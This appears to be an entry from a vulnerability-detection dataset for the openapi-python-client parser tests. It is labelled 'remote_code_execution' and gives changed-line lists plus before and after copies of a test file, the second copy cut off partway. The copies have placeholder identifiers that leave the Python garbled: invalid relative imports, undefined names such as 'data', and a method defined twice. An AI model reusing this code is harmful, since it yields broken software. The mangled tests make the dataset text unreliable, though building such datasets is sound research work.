"tag_2": EndpointCollection("tag_2", endpoints=[endpoint_2], relative_imports={"2"}),
}
def test_from_data_errors(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, EndpointCollection, ParseError
path_1_put = oai.Operation.construct()
path_1_post = oai.Operation.construct(tags=["tag_2", "tag_3"])
path_2_get = oai.Operation.construct()
data = {
"path_1": oai.PathItem.construct(post=path_1_post, put=path_1_put),
"path_2": oai.PathItem.construct(get=path_2_get),
}
endpoint_from_data = mocker.patch.object(
Endpoint, "from_data", side_effect=[ParseError(data="1"), ParseError(data="2"), ParseError(data="3")]
)
result = EndpointCollection.from_data(data=data)
endpoint_from_data.assert_has_calls(
[
mocker.call(data=path_1_put, path="path_1", method="put", tag="default"),
mocker.call(data=path_1_post, path="path_1", method="post", tag="tag_2"),
mocker.call(data=path_2_get, path="path_2", method="get", tag="default"),
],
)
assert result["default"].parse_errors[0].data == "1"
assert result["default"].parse_errors[1].data == "3"
assert result["tag_2"].parse_errors[0].data == "2"
| remote_code_execution | {
"code": [
"from openapi_python_client import GeneratorError"
],
"line_no": [
5
]
} | {
"code": [
"from openapi_python_client import GeneratorError, utils",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=data.description)"
],
"line_no": [
5,
549
]
} | from pydantic import ValidationError
from pydantic.error_wrappers import ErrorWrapper
import .openapi_python_client.schema as oai
from openapi_python_client import GeneratorError
from openapi_python_client.parser.errors import ParseError
VAR_0 = "openapi_python_client.parser.openapi"
class CLASS_0:
def FUNC_0(self, VAR_1):
VAR_2 = VAR_1.patch(f"{VAR_0}.Schemas")
VAR_3 = VAR_1.patch(f"{VAR_0}.EndpointCollection")
VAR_4 = VAR_1.patch(f"{VAR_0}.oai.OpenAPI")
VAR_5 = VAR_4.parse_obj.return_value
VAR_6 = VAR_1.MagicMock()
VAR_7 = VAR_1.patch(f"{VAR_0}.EnumProperty.get_all_enums")
from openapi_python_client.parser.openapi import GeneratorData
VAR_8 = GeneratorData.from_dict(VAR_6)
VAR_4.parse_obj.assert_called_once_with(VAR_6)
VAR_2.build.assert_called_once_with(schemas=VAR_5.components.schemas)
VAR_3.from_data.assert_called_once_with(VAR_39=VAR_5.paths)
VAR_7.assert_called_once_with()
assert VAR_8 == GeneratorData(
title=VAR_5.info.title,
description=VAR_5.info.description,
version=VAR_5.info.version,
endpoint_collections_by_tag=VAR_3.from_data.return_value,
schemas=VAR_2.build.return_value,
enums=VAR_7.return_value,
)
VAR_5.components = None
VAR_2.build.reset_mock()
VAR_8 = GeneratorData.from_dict(VAR_6)
VAR_2.build.assert_not_called()
assert VAR_8.schemas == VAR_2()
def FUNC_1(self, VAR_1):
VAR_2 = VAR_1.patch(f"{VAR_0}.Schemas")
VAR_6 = {}
from openapi_python_client.parser.openapi import GeneratorData
VAR_8 = GeneratorData.from_dict(VAR_6)
assert VAR_8 == GeneratorError(
header="Failed to parse VAR_4 document",
detail=(
"2 validation errors for VAR_4\n"
"info\n"
" field required (type=value_error.missing)\n"
"paths\n"
" field required (type=value_error.missing)"
),
)
VAR_2.build.assert_not_called()
VAR_2.assert_not_called()
class CLASS_1:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_9 = oai.Schema.construct(
title=VAR_1.MagicMock(),
description=VAR_1.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": VAR_1.MagicMock(), "OptionalDateTime": VAR_1.MagicMock(),},
)
VAR_10 = VAR_1.MagicMock(autospec=Property)
VAR_11 = VAR_1.MagicMock()
VAR_10.get_imports.return_value = {VAR_11}
VAR_12 = VAR_1.MagicMock(autospec=Property)
VAR_13 = VAR_1.MagicMock()
VAR_12.get_imports.return_value = {VAR_13}
VAR_14 = VAR_1.patch(
f"{VAR_0}.property_from_data", side_effect=[VAR_10, VAR_12],
)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
VAR_16 = Model.from_data(VAR_39=VAR_9, name=VAR_1.MagicMock())
VAR_15.assert_called_once_with(VAR_9.title)
VAR_14.assert_has_calls(
[
VAR_1.call(name="RequiredEnum", required=True, VAR_39=VAR_9.properties["RequiredEnum"]),
VAR_1.call(name="OptionalDateTime", required=False, VAR_39=VAR_9.properties["OptionalDateTime"]),
]
)
VAR_10.get_imports.assert_called_once_with(VAR_62="")
VAR_12.get_imports.assert_called_once_with(VAR_62="")
assert VAR_16 == Model(
VAR_61=VAR_15(),
required_properties=[VAR_10],
optional_properties=[VAR_12],
relative_imports={VAR_11, VAR_13,},
description=VAR_9.description,
)
def FUNC_3(self, VAR_1):
VAR_9 = oai.Schema.construct(
title=VAR_1.MagicMock(),
description=VAR_1.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": VAR_1.MagicMock(), "OptionalDateTime": VAR_1.MagicMock(),},
)
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_14 = VAR_1.patch(f"{VAR_0}.property_from_data", return_value=VAR_17,)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
VAR_16 = Model.from_data(VAR_39=VAR_9, name=VAR_1.MagicMock())
VAR_15.assert_called_once_with(VAR_9.title)
VAR_14.assert_called_once_with(
name="RequiredEnum", required=True, VAR_39=VAR_9.properties["RequiredEnum"]
)
assert VAR_16 == VAR_17
class CLASS_2:
def FUNC_4(self, VAR_1):
VAR_18 = VAR_1.patch(f"{VAR_0}.Model.from_data")
VAR_9 = {"1": VAR_1.MagicMock(enum=None), "2": VAR_1.MagicMock(enum=None), "3": VAR_1.MagicMock(enum=None)}
VAR_19 = VAR_1.MagicMock()
VAR_20 = VAR_1.MagicMock()
VAR_21 = ParseError()
VAR_18.side_effect = [VAR_19, VAR_20, VAR_21]
from openapi_python_client.parser.openapi import .Schemas
VAR_16 = VAR_2.build(schemas=VAR_9)
VAR_18.assert_has_calls([VAR_1.call(VAR_39=value, name=name) for (name, value) in VAR_9.items()])
assert VAR_16 == VAR_2(
models={VAR_19.reference.class_name: VAR_19, VAR_20.reference.class_name: VAR_20,}, errors=[VAR_21]
)
def FUNC_5(self):
from openapi_python_client.parser.openapi import .Schemas
VAR_22 = oai.Reference.construct()
VAR_9 = {1: VAR_22}
VAR_16 = VAR_2.build(schemas=VAR_9)
assert VAR_16.errors[0] == ParseError(VAR_39=VAR_22, detail="Reference schemas are not supported.")
def FUNC_6(self, VAR_1):
from openapi_python_client.parser.openapi import .Schemas
VAR_18 = VAR_1.patch(f"{VAR_0}.Model.from_data")
VAR_23 = VAR_1.patch(f"{VAR_0}.EnumProperty")
VAR_9 = {"1": VAR_1.MagicMock(enum=["val1", "val2", "val3"])}
VAR_2.build(schemas=VAR_9)
VAR_23.assert_called()
VAR_18.assert_not_called()
class CLASS_3:
def FUNC_7(self, VAR_1):
VAR_24 = VAR_1.MagicMock()
VAR_25 = oai.RequestBody.construct(
content={
"application/x-www-form-urlencoded": oai.MediaType.construct(
media_type_schema=oai.Reference.construct(VAR_24=ref)
)
}
)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_form_body(VAR_25)
VAR_15.assert_called_once_with(VAR_24)
assert VAR_16 == VAR_15()
def FUNC_8(self):
VAR_25 = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_form_body(VAR_25)
assert VAR_16 is None
def FUNC_9(self, VAR_1):
VAR_24 = VAR_1.MagicMock()
VAR_25 = oai.RequestBody.construct(
content={"multipart/form-data": oai.MediaType.construct(media_type_schema=oai.Reference.construct(VAR_24=ref))}
)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_multipart_body(VAR_25)
VAR_15.assert_called_once_with(VAR_24)
assert VAR_16 == VAR_15()
def FUNC_10(self):
VAR_25 = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_multipart_body(VAR_25)
assert VAR_16 is None
def FUNC_11(self, VAR_1):
VAR_26 = VAR_1.MagicMock()
VAR_25 = oai.RequestBody.construct(
content={"application/json": oai.MediaType.construct(media_type_schema=VAR_26)}
)
VAR_14 = VAR_1.patch(f"{VAR_0}.property_from_data")
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_json_body(VAR_25)
VAR_14.assert_called_once_with("json_body", required=True, VAR_39=VAR_26)
assert VAR_16 == VAR_14()
def FUNC_12(self):
VAR_25 = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_json_body(VAR_25)
assert VAR_16 is None
def FUNC_13(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_27 = VAR_1.patch.object(Endpoint, "parse_request_form_body")
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
Endpoint._add_body(VAR_28, oai.Operation.construct())
VAR_27.assert_not_called()
def FUNC_14(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_1.patch.object(Endpoint, "parse_request_form_body")
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_1.patch.object(Endpoint, "parse_request_json_body", return_value=VAR_17)
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_29 = VAR_1.MagicMock()
VAR_16 = Endpoint._add_body(VAR_28, oai.Operation.construct(requestBody=VAR_29))
assert VAR_16 == ParseError(detail=f"cannot parse VAR_25 of VAR_28 {endpoint.name}", VAR_39=VAR_17.data)
def FUNC_15(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, Reference
from openapi_python_client.parser.properties import Property
VAR_29 = VAR_1.MagicMock()
VAR_30 = Reference.from_ref(VAR_24="a")
VAR_31 = Reference.from_ref(VAR_24="b")
VAR_27 = VAR_1.patch.object(
Endpoint, "parse_request_form_body", return_value=VAR_30
)
VAR_32 = VAR_1.patch.object(
Endpoint, "parse_multipart_body", return_value=VAR_31
)
VAR_33 = VAR_1.MagicMock(autospec=Property)
VAR_34 = VAR_1.MagicMock()
VAR_33.get_imports.return_value = {VAR_34}
VAR_35 = VAR_1.patch.object(Endpoint, "parse_request_json_body", return_value=VAR_33)
VAR_36 = VAR_1.patch(
f"{VAR_0}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_28 = Endpoint._add_body(VAR_28, oai.Operation.construct(requestBody=VAR_29))
VAR_27.assert_called_once_with(VAR_29)
VAR_35.assert_called_once_with(VAR_29)
VAR_32.assert_called_once_with(VAR_29)
VAR_36.assert_has_calls(
[
VAR_1.call(VAR_30, VAR_62="..models"),
VAR_1.call(VAR_31, VAR_62="..models"),
]
)
VAR_33.get_imports.assert_called_once_with(VAR_62="..models")
assert VAR_28.relative_imports == {"import_1", "import_2", "import_3", VAR_34}
assert VAR_28.json_body == VAR_33
assert VAR_28.form_body_reference == VAR_30
assert VAR_28.multipart_body_reference == VAR_31
def FUNC_16(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_37 = VAR_1.MagicMock()
VAR_38 = VAR_1.MagicMock()
VAR_39 = {
"200": VAR_37,
"404": VAR_38,
}
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_40 = VAR_1.patch(f"{VAR_0}.response_from_data", return_value=VAR_17)
VAR_41 = Endpoint._add_responses(VAR_28, VAR_39)
VAR_40.assert_called_once_with(status_code=200, VAR_39=VAR_37)
assert VAR_41 == ParseError(
detail=f"cannot parse VAR_41 of VAR_28 {endpoint.name}", VAR_39=VAR_17.data
)
def FUNC_17(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, Reference, RefResponse
VAR_37 = VAR_1.MagicMock()
VAR_38 = VAR_1.MagicMock()
VAR_39 = {
"200": VAR_37,
"404": VAR_38,
}
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_42 = Reference.from_ref(VAR_24="ref_1")
VAR_43 = Reference.from_ref(VAR_24="ref_2")
VAR_44 = RefResponse(status_code=200, VAR_61=VAR_42)
VAR_45 = RefResponse(status_code=404, VAR_61=VAR_43)
VAR_40 = VAR_1.patch(f"{VAR_0}.response_from_data", side_effect=[VAR_44, VAR_45])
VAR_36 = VAR_1.patch(
f"{VAR_0}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
VAR_28 = Endpoint._add_responses(VAR_28, VAR_39)
VAR_40.assert_has_calls(
[VAR_1.call(status_code=200, VAR_39=VAR_37), VAR_1.call(status_code=404, VAR_39=VAR_38),]
)
VAR_36.assert_has_calls(
[VAR_1.call(VAR_42, VAR_62="..models"), VAR_1.call(VAR_43, VAR_62="..models"),]
)
assert VAR_28.responses == [VAR_44, VAR_45]
assert VAR_28.relative_imports == {"import_1", "import_2", "import_3"}
def FUNC_18(self):
from openapi_python_client.parser.openapi import Endpoint
VAR_28 = Endpoint(
VAR_56="path", VAR_57="method", description=None, name="name", requires_security=False, tag="tag",
)
assert Endpoint._add_parameters(VAR_28, oai.Operation.construct()) == VAR_28
def FUNC_19(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_28 = Endpoint(
VAR_56="path", VAR_57="method", description=None, name="name", requires_security=False, tag="tag",
)
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_1.patch(f"{VAR_0}.property_from_data", return_value=VAR_17)
VAR_46 = oai.Parameter.construct(name="test", required=True, param_schema=VAR_1.MagicMock(), param_in="cookie")
VAR_16 = Endpoint._add_parameters(VAR_28, oai.Operation.construct(parameters=[VAR_46]))
assert VAR_16 == ParseError(VAR_39=VAR_17.data, detail=f"cannot parse parameter of VAR_28 {endpoint.name}")
def FUNC_20(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_28 = Endpoint(
VAR_56="path", VAR_57="method", description=None, name="name", requires_security=False, tag="tag",
)
VAR_1.patch(f"{VAR_0}.property_from_data")
VAR_46 = oai.Parameter.construct(name="test", required=True, param_schema=VAR_1.MagicMock(), param_in="cookie")
VAR_16 = Endpoint._add_parameters(VAR_28, oai.Operation.construct(parameters=[VAR_46]))
assert VAR_16 == ParseError(VAR_39=VAR_46, detail="Parameter must be declared in VAR_56 or query")
def FUNC_21(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
from openapi_python_client.parser.properties import Property
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_47 = VAR_1.MagicMock(autospec=Property)
VAR_48 = VAR_1.MagicMock()
VAR_47.get_imports = VAR_1.MagicMock(return_value={VAR_48})
VAR_49 = VAR_1.MagicMock(autospec=Property)
VAR_50 = VAR_1.MagicMock()
VAR_49.get_imports = VAR_1.MagicMock(return_value={VAR_50})
VAR_51 = VAR_1.MagicMock(autospec=Property)
VAR_52 = VAR_1.MagicMock()
VAR_51.get_imports = VAR_1.MagicMock(return_value={VAR_52})
VAR_14 = VAR_1.patch(
f"{VAR_0}.property_from_data", side_effect=[VAR_47, VAR_49, VAR_51]
)
VAR_53 = VAR_1.MagicMock()
VAR_54 = VAR_1.MagicMock()
VAR_55 = VAR_1.MagicMock()
VAR_39 = oai.Operation.construct(
parameters=[
oai.Parameter.construct(
name="path_prop_name", required=True, param_schema=VAR_53, param_in="path"
),
oai.Parameter.construct(
name="query_prop_name", required=False, param_schema=VAR_54, param_in="query"
),
oai.Parameter.construct(
name="header_prop_name", required=False, param_schema=VAR_55, param_in="header"
),
oai.Reference.construct(), # Should be ignored
oai.Parameter.construct(), # Should be ignored
]
)
VAR_28 = Endpoint._add_parameters(VAR_28, VAR_39)
VAR_14.assert_has_calls(
[
VAR_1.call(name="path_prop_name", required=True, VAR_39=VAR_53),
VAR_1.call(name="query_prop_name", required=False, VAR_39=VAR_54),
VAR_1.call(name="header_prop_name", required=False, VAR_39=VAR_55),
]
)
VAR_47.get_imports.assert_called_once_with(VAR_62="..models")
VAR_49.get_imports.assert_called_once_with(VAR_62="..models")
VAR_51.get_imports.assert_called_once_with(VAR_62="..models")
assert VAR_28.relative_imports == {"import_3", VAR_48, VAR_50, VAR_52}
assert VAR_28.path_parameters == [VAR_47]
assert VAR_28.query_parameters == [VAR_49]
assert VAR_28.header_parameters == [VAR_51]
def FUNC_22(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_56 = VAR_1.MagicMock()
VAR_57 = VAR_1.MagicMock()
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_58 = VAR_1.patch.object(Endpoint, "_add_parameters", return_value=VAR_17)
VAR_39 = oai.Operation.construct(
description=VAR_1.MagicMock(),
operationId=VAR_1.MagicMock(),
security={"blah": "bloo"},
responses=VAR_1.MagicMock(),
)
VAR_16 = Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="default")
assert VAR_16 == VAR_17
def FUNC_23(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_56 = VAR_1.MagicMock()
VAR_57 = VAR_1.MagicMock()
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_58 = VAR_1.patch.object(Endpoint, "_add_parameters")
VAR_59 = VAR_1.patch.object(Endpoint, "_add_responses", return_value=VAR_17)
VAR_39 = oai.Operation.construct(
description=VAR_1.MagicMock(),
operationId=VAR_1.MagicMock(),
security={"blah": "bloo"},
responses=VAR_1.MagicMock(),
)
VAR_16 = Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="default")
assert VAR_16 == VAR_17
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_56 = VAR_1.MagicMock()
VAR_57 = VAR_1.MagicMock()
VAR_58 = VAR_1.patch.object(Endpoint, "_add_parameters")
VAR_59 = VAR_1.patch.object(Endpoint, "_add_responses")
VAR_60 = VAR_1.patch.object(Endpoint, "_add_body")
VAR_39 = oai.Operation.construct(
description=VAR_1.MagicMock(),
operationId=VAR_1.MagicMock(),
security={"blah": "bloo"},
responses=VAR_1.MagicMock(),
)
VAR_28 = Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="default")
assert VAR_28 == VAR_60.return_value
VAR_58.assert_called_once_with(
Endpoint(
VAR_56=path,
VAR_57=method,
description=VAR_39.description,
name=VAR_39.operationId,
requires_security=True,
tag="default",
),
VAR_39,
)
VAR_59.assert_called_once_with(VAR_58.return_value, VAR_39.responses)
VAR_60.assert_called_once_with(VAR_59.return_value, VAR_39)
data.security = None
VAR_58.reset_mock()
Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="a")
VAR_58.assert_called_once_with(
Endpoint(
VAR_56=path,
VAR_57=method,
description=VAR_39.description,
name=VAR_39.operationId,
requires_security=False,
tag="a",
),
VAR_39,
)
data.operationId = None
assert Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="a") == ParseError(
VAR_39=data, detail="Path operations with operationId are not yet supported"
)
class CLASS_4:
def FUNC_24(self, VAR_1):
from openapi_python_client.parser.openapi import .import_string_from_reference
from openapi_python_client.parser.reference import Reference
VAR_61 = VAR_1.MagicMock(autospec=Reference)
VAR_16 = VAR_36(VAR_61)
assert VAR_16 == f"from .{VAR_61.module_name} import {VAR_61.class_name}"
def FUNC_25(self, VAR_1):
from openapi_python_client.parser.openapi import .import_string_from_reference
from openapi_python_client.parser.reference import Reference
VAR_62 = VAR_1.MagicMock(autospec=str)
VAR_61 = VAR_1.MagicMock(autospec=Reference)
VAR_16 = VAR_36(VAR_61=reference, VAR_62=prefix)
assert VAR_16 == f"from {VAR_62}.{VAR_61.module_name} import {VAR_61.class_name}"
class CLASS_5:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, VAR_3
VAR_63 = oai.Operation.construct()
VAR_64 = oai.Operation.construct(tags=["tag_2", "tag_3"])
VAR_65 = oai.Operation.construct()
VAR_39 = {
"path_1": oai.PathItem.construct(post=VAR_64, put=VAR_63),
"path_2": oai.PathItem.construct(get=VAR_65),
}
VAR_66 = VAR_1.MagicMock(autospec=Endpoint, tag="default", relative_imports={"1", "2"})
VAR_67 = VAR_1.MagicMock(autospec=Endpoint, tag="tag_2", relative_imports={"2"})
VAR_68 = VAR_1.MagicMock(autospec=Endpoint, tag="default", relative_imports={"2", "3"})
VAR_69 = VAR_1.patch.object(
Endpoint, "from_data", side_effect=[VAR_66, VAR_67, VAR_68]
)
VAR_16 = VAR_3.from_data(VAR_39=data)
VAR_69.assert_has_calls(
[
VAR_1.call(VAR_39=VAR_63, VAR_56="path_1", VAR_57="put", tag="default"),
VAR_1.call(VAR_39=VAR_64, VAR_56="path_1", VAR_57="post", tag="tag_2"),
VAR_1.call(VAR_39=VAR_65, VAR_56="path_2", VAR_57="get", tag="default"),
],
)
assert VAR_16 == {
"default": VAR_3(
"default", endpoints=[VAR_66, VAR_68], relative_imports={"1", "2", "3"}
),
"tag_2": VAR_3("tag_2", endpoints=[VAR_67], relative_imports={"2"}),
}
def FUNC_26(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, VAR_3, ParseError
VAR_63 = oai.Operation.construct()
VAR_64 = oai.Operation.construct(tags=["tag_2", "tag_3"])
VAR_65 = oai.Operation.construct()
VAR_39 = {
"path_1": oai.PathItem.construct(post=VAR_64, put=VAR_63),
"path_2": oai.PathItem.construct(get=VAR_65),
}
VAR_69 = VAR_1.patch.object(
Endpoint, "from_data", side_effect=[ParseError(VAR_39="1"), ParseError(VAR_39="2"), ParseError(VAR_39="3")]
)
VAR_16 = VAR_3.from_data(VAR_39=data)
VAR_69.assert_has_calls(
[
VAR_1.call(VAR_39=VAR_63, VAR_56="path_1", VAR_57="put", tag="default"),
VAR_1.call(VAR_39=VAR_64, VAR_56="path_1", VAR_57="post", tag="tag_2"),
VAR_1.call(VAR_39=VAR_65, VAR_56="path_2", VAR_57="get", tag="default"),
],
)
assert VAR_16["default"].parse_errors[0].data == "1"
assert VAR_16["default"].parse_errors[1].data == "3"
assert VAR_16["tag_2"].parse_errors[0].data == "2"
| from pydantic import ValidationError
from pydantic.error_wrappers import ErrorWrapper
import .openapi_python_client.schema as oai
from openapi_python_client import GeneratorError, utils
from openapi_python_client.parser.errors import ParseError
VAR_0 = "openapi_python_client.parser.openapi"
class CLASS_0:
def FUNC_0(self, VAR_1):
VAR_2 = VAR_1.patch(f"{VAR_0}.Schemas")
VAR_3 = VAR_1.patch(f"{VAR_0}.EndpointCollection")
VAR_4 = VAR_1.patch(f"{VAR_0}.oai.OpenAPI")
VAR_5 = VAR_4.parse_obj.return_value
VAR_6 = VAR_1.MagicMock()
VAR_7 = VAR_1.patch(f"{VAR_0}.EnumProperty.get_all_enums")
from openapi_python_client.parser.openapi import GeneratorData
VAR_8 = GeneratorData.from_dict(VAR_6)
VAR_4.parse_obj.assert_called_once_with(VAR_6)
VAR_2.build.assert_called_once_with(schemas=VAR_5.components.schemas)
VAR_3.from_data.assert_called_once_with(VAR_39=VAR_5.paths)
VAR_7.assert_called_once_with()
assert VAR_8 == GeneratorData(
title=VAR_5.info.title,
description=VAR_5.info.description,
version=VAR_5.info.version,
endpoint_collections_by_tag=VAR_3.from_data.return_value,
schemas=VAR_2.build.return_value,
enums=VAR_7.return_value,
)
VAR_5.components = None
VAR_2.build.reset_mock()
VAR_8 = GeneratorData.from_dict(VAR_6)
VAR_2.build.assert_not_called()
assert VAR_8.schemas == VAR_2()
def FUNC_1(self, VAR_1):
VAR_2 = VAR_1.patch(f"{VAR_0}.Schemas")
VAR_6 = {}
from openapi_python_client.parser.openapi import GeneratorData
VAR_8 = GeneratorData.from_dict(VAR_6)
assert VAR_8 == GeneratorError(
header="Failed to parse VAR_4 document",
detail=(
"2 validation errors for VAR_4\n"
"info\n"
" field required (type=value_error.missing)\n"
"paths\n"
" field required (type=value_error.missing)"
),
)
VAR_2.build.assert_not_called()
VAR_2.assert_not_called()
class CLASS_1:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_9 = oai.Schema.construct(
title=VAR_1.MagicMock(),
description=VAR_1.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": VAR_1.MagicMock(), "OptionalDateTime": VAR_1.MagicMock(),},
)
VAR_10 = VAR_1.MagicMock(autospec=Property)
VAR_11 = VAR_1.MagicMock()
VAR_10.get_imports.return_value = {VAR_11}
VAR_12 = VAR_1.MagicMock(autospec=Property)
VAR_13 = VAR_1.MagicMock()
VAR_12.get_imports.return_value = {VAR_13}
VAR_14 = VAR_1.patch(
f"{VAR_0}.property_from_data", side_effect=[VAR_10, VAR_12],
)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
VAR_16 = Model.from_data(VAR_39=VAR_9, name=VAR_1.MagicMock())
VAR_15.assert_called_once_with(VAR_9.title)
VAR_14.assert_has_calls(
[
VAR_1.call(name="RequiredEnum", required=True, VAR_39=VAR_9.properties["RequiredEnum"]),
VAR_1.call(name="OptionalDateTime", required=False, VAR_39=VAR_9.properties["OptionalDateTime"]),
]
)
VAR_10.get_imports.assert_called_once_with(VAR_62="")
VAR_12.get_imports.assert_called_once_with(VAR_62="")
assert VAR_16 == Model(
VAR_61=VAR_15(),
required_properties=[VAR_10],
optional_properties=[VAR_12],
relative_imports={VAR_11, VAR_13,},
description=VAR_9.description,
)
def FUNC_3(self, VAR_1):
VAR_9 = oai.Schema.construct(
title=VAR_1.MagicMock(),
description=VAR_1.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": VAR_1.MagicMock(), "OptionalDateTime": VAR_1.MagicMock(),},
)
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_14 = VAR_1.patch(f"{VAR_0}.property_from_data", return_value=VAR_17,)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
VAR_16 = Model.from_data(VAR_39=VAR_9, name=VAR_1.MagicMock())
VAR_15.assert_called_once_with(VAR_9.title)
VAR_14.assert_called_once_with(
name="RequiredEnum", required=True, VAR_39=VAR_9.properties["RequiredEnum"]
)
assert VAR_16 == VAR_17
class CLASS_2:
def FUNC_4(self, VAR_1):
VAR_18 = VAR_1.patch(f"{VAR_0}.Model.from_data")
VAR_9 = {"1": VAR_1.MagicMock(enum=None), "2": VAR_1.MagicMock(enum=None), "3": VAR_1.MagicMock(enum=None)}
VAR_19 = VAR_1.MagicMock()
VAR_20 = VAR_1.MagicMock()
VAR_21 = ParseError()
VAR_18.side_effect = [VAR_19, VAR_20, VAR_21]
from openapi_python_client.parser.openapi import .Schemas
VAR_16 = VAR_2.build(schemas=VAR_9)
VAR_18.assert_has_calls([VAR_1.call(VAR_39=value, name=name) for (name, value) in VAR_9.items()])
assert VAR_16 == VAR_2(
models={VAR_19.reference.class_name: VAR_19, VAR_20.reference.class_name: VAR_20,}, errors=[VAR_21]
)
def FUNC_5(self):
from openapi_python_client.parser.openapi import .Schemas
VAR_22 = oai.Reference.construct()
VAR_9 = {1: VAR_22}
VAR_16 = VAR_2.build(schemas=VAR_9)
assert VAR_16.errors[0] == ParseError(VAR_39=VAR_22, detail="Reference schemas are not supported.")
def FUNC_6(self, VAR_1):
from openapi_python_client.parser.openapi import .Schemas
VAR_18 = VAR_1.patch(f"{VAR_0}.Model.from_data")
VAR_23 = VAR_1.patch(f"{VAR_0}.EnumProperty")
VAR_9 = {"1": VAR_1.MagicMock(enum=["val1", "val2", "val3"])}
VAR_2.build(schemas=VAR_9)
VAR_23.assert_called()
VAR_18.assert_not_called()
class CLASS_3:
def FUNC_7(self, VAR_1):
VAR_24 = VAR_1.MagicMock()
VAR_25 = oai.RequestBody.construct(
content={
"application/x-www-form-urlencoded": oai.MediaType.construct(
media_type_schema=oai.Reference.construct(VAR_24=ref)
)
}
)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_form_body(VAR_25)
VAR_15.assert_called_once_with(VAR_24)
assert VAR_16 == VAR_15()
def FUNC_8(self):
VAR_25 = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_form_body(VAR_25)
assert VAR_16 is None
def FUNC_9(self, VAR_1):
VAR_24 = VAR_1.MagicMock()
VAR_25 = oai.RequestBody.construct(
content={"multipart/form-data": oai.MediaType.construct(media_type_schema=oai.Reference.construct(VAR_24=ref))}
)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_multipart_body(VAR_25)
VAR_15.assert_called_once_with(VAR_24)
assert VAR_16 == VAR_15()
def FUNC_10(self):
VAR_25 = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_multipart_body(VAR_25)
assert VAR_16 is None
def FUNC_11(self, VAR_1):
VAR_26 = VAR_1.MagicMock()
VAR_25 = oai.RequestBody.construct(
content={"application/json": oai.MediaType.construct(media_type_schema=VAR_26)}
)
